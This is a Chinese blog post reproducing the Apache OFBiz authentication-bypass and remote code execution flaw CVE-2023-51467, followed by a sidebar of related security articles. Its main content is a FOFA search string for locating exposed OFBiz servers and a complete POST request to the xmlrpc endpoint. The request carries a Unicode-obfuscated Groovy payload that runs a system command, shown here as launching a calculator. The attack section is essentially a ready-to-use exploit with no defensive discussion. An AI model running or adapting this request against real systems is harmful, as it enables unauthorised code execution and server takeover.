【漏洞复现】Apache OFBiz远程代码执行漏洞(CVE-2023-51467)

已于 2023-12-28 17:21:59 修改
阅读量1.3k 收藏 7
点赞数 8
分类专栏: 漏洞复现 文章标签: apache web安全 网络安全
于 2023-12-28 17:06:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45530380/article/details/135273653
版权

文章目录

漏洞描述

Apache OFBiz远程代码执行漏洞,攻击者可构造恶意请求绕过身份认证,利用后台相关接口功能执行groovy代码,导致远程代码执行。

资产测绘

FOFA:app="Apache_OFBiz"

漏洞复现

POST /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y
Host: 
Content-Type: application/x-www-form-urlencoded

groovyProgram=\u006A\u0061\u0076\u0061\u002E\u006C\u0061\u006E\u0067\u002E\u0052\u0075\u006E\u0074\u0069\u006D\u0065\u002E\u0067\u0065\u0074\u0052\u0075\u006E\u0074\u0069\u006D\u0065\u0028\u0029\u002E\u0065\u0078\u0065\u0063\u0028\u0022\u006F\u0070\u0065\u006E\u0020\u002D\u0061\u0020\u0063\u0061\u006C\u0063\u0075\u006C\u0061\u0074\u006F\u0072\u0022\u0029

在这里插入图片描述

新疆东坡肉
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Goby 漏洞发布| Apache OFBiz webtools/control/ProgramExport 远程代码执行漏洞CVE-2023-51467
m0_46699477的博客
12-28 655
Apache OFBiz 是一个开源的企业资源规划(ERP)系统,提供了多种商业功能和模块。Apache OFBizwebtools/control/ProgramExport 存在代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
Apache Flink 文件上传漏洞 (CVE-2020-17518)
qq_50854662的博客
05-22 1142
Apache Flink 文件上传漏洞 (CVE-2020-17518)
【已复现Apache OFBiz 远程代码执行漏洞(CVE-2023-51467)安全风险通告
smellycat000的专栏
01-03 635
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Apache OFBiz 远程代码执行漏洞漏洞编号QVD-2023-48721,CVE-2023-51467公开时间2023-12-27影响对象数量级万级奇安信评级高危CVSS 3.1分数9.8威胁类型代码执行利用可能性高POC状态已公开在野利用状态未发现EXP状态未公开技术细节状态已公开危害描述:未授权的攻击者可以在目标服务器上执行任意...
Apache OfBiz ERP 系统中存在严重 0day,可导致企业易受攻击
smellycat000的专栏
12-28 190
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士开源的ERP 系统 Apache OfBiz 中存在一个严重的 0day 漏洞CVE-2023-51467,可用于绕过认证防护措施。该漏洞位于登录功能中,是因为另外一个严重漏洞CVE-2023-49070的补丁不完整导致的,后者的CVSS评分为9.8,在本月初发布。SonicWall Capture Labs 威胁研究团队发现了这个漏洞,并指出,...
Apache OFBiz远程代码执行漏洞CVE-2023-51467
Keepb1ue的博客
12-28 754
该系统的身份验证机制存在缺陷,可能允许未授权用户通过绕过标准登录流程来获取后台访问权限。此外,在处理特定数据输入时,存在漏洞可能导致不安全代码执行,增加了系统安全性的风险。未授权访问和潜在的远程代码执行:此漏洞可能允许攻击者绕过安全限制,实现未授权访问和远程代码执行,严重时可能导致数据泄露、系统控制权被夺取。Apache官方已发布安全更新
CVE-2021-26295 Apache OFBiz 反序列化漏洞.md
04-13
CVE-2021-26295 Apache OFBiz 反序列化漏洞
CVE-2020-9496 ofbiz反序列化漏洞分析1
08-03
漏洞是由于OFBiz的XML-RPC端点未正确地处理反序列化,导致攻击者可以通过发送恶意的XML-RPC请求来执行恶意代码。 要搭建漏洞环境,需要使用Gradle进行debug调试,配置如下:debug启动程序后,访问...
CVE-2021-26295-Apache-OFBiz:CVE-2021-26295 Apache OFBiz rmi反序列化POC
03-25
CVE-2021-26295-Apache-OFBiz CVE-2021-26295 Apache OFBiz rmi反序列化POC需要将ysoserial.jar放置在目录下,并且不能使用java的高版本
apache-ofbiz-13.07.02.zip
08-14
apache-ofbiz-13.07.02.zip
Apache OFBiz企业流程自动化-其他
06-11
Apache OFBiz是用于企业流程自动化的开源产品,包括ERP(企业资源规划)、CRM(客户关系管理)、电子商务/电子商务、SCM(供应链管理)、MRP(制造资源规划)、MMS / EAM(维护管理系统/企业资产管理)的框架组件和...
Apache OFBiz 远程代码执行漏洞(CVE-2023-51467)
3tefanie丶zhou的博客
12-29 1075
【身在井隅,心向璀璨】
漏洞复现--Apache OFBiz groovy RCE(CVE-2023-51467
qq_53003652的博客
12-30 548
Apache OFBizApache Open For Business)是一个开源的企业资源规划(ERP)系统和企业应用开发框架。它由Apache软件基金会开发和维护,提供了一套完整的工具和组件,用于构建和定制企业级应用。
复现Apache OFBiz RCE漏洞(CVE-2023-51467)_03
fushuang333的博客
12-30 874
Apache OFBiz RCE漏洞。通过提交恶意构造的参数破坏命令语句结构,会执行恶意命令,甚至控制整个服务器。
Error系列-CVE CIS-2023系统漏洞处理方案集合
tangdou369098655的博客
06-06 6060
网络安全-CVE - CIS 漏洞分析以及解决
攻击容器集群管理平台
deeplearnings的博客
08-18 932
随着大数据时代的到来,容器化技术(Containerization)运用地越来越广泛,容器集群管理平台也应运而生。 当前主流的容器集群管理技术,包括 Docker 官方的 Docker Swarm、ApacheMesos和 Google 的 Kubernetes(我厂也在用)。 其中 Docker Swarm 使用了 Docker 原生的标准 API 来管理容器,另外的 Mesos
Mesosphere入门指南(一)
weixin_33694620的博客
09-20 860
本文讲的是Mesosphere入门指南(一),【编者的话】本文为Mesosphere官方博客中发布的系列文章的第一部分,Mesosphere在本篇系列文章中分享了DC/OS的入门指南,并且做了演示。 在Mesosphere,大家都爱用Mesos。显而易见地,这是一个被数以百计的公司成功证明可以运行容器在生产环境中的技术。但是作为我们通常所说的“可扩...
避无可避:Mesos安全问题的几点思考
weixin_34152820的博客
12-13 101
小数今天为大家抱来的内容,是有关Mesos的一个安全问题。这个问题可以说是目前行业内容器管理工具的一个通病,Mesos的团队已经在尝试解决它,那么在正式的解决方案出来前,我们也可以有办法来避免它——看看本文作者是如何思考的。 笔者研究Mesos已经很长时间了,在大多数情况下,享受着围绕Mesos整个生态系统的成长过程。为了应用(或者微服务...
Apache ShardingSphere实战与核心源码剖析
最新发布
在青海看海的企鹅的博客
06-10 867
Apache ShardingSphere实战与核心源码剖析 1.数据库架构演变与分库分表介绍 1.1 海量数据存储问题及解决方案 如今随着互联网的发展,数据的量级也是成指数的增长,从GB到TB到PB。对数据的各种操作也是愈加的困难,传统的关系性数据库已经无法满足快速查询与插入数据的需求。 阿里数据中心内景( 阿里、百度、腾讯这样的互联网巨头,数据量据说已经接近EB级) 使用NoSQL数据库, 通过降低数据的安全性,减少对事务的支持,减少对复杂查询的支持,来获取性能上的提升。 NoSQL并不是万能的
CVE-2020-9496
08-31
CVE-2020-9496是Apache Ofbiz组件中的一个漏洞。根据引用和引用的内容,该漏洞被评级为高危,漏洞评分为8.0。这个漏洞的具体细节和复现可以参考引用中的文章。根据引用的内容,该漏洞是通过利用Apache Ofbiz中的XMLRPC RCE漏洞来实现的。具体的复现过程可以参考引用中提供的文章。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [CVE-2020-9496 Apache OFBiz XML-RPC反序列化漏洞复现](https://blog.csdn.net/Shadow_DAI_990101/article/details/126490894)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [CVE-2020-9496:Apache Ofbiz 反序列化漏洞分析](https://blog.csdn.net/weixin_45728976/article/details/108872281)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值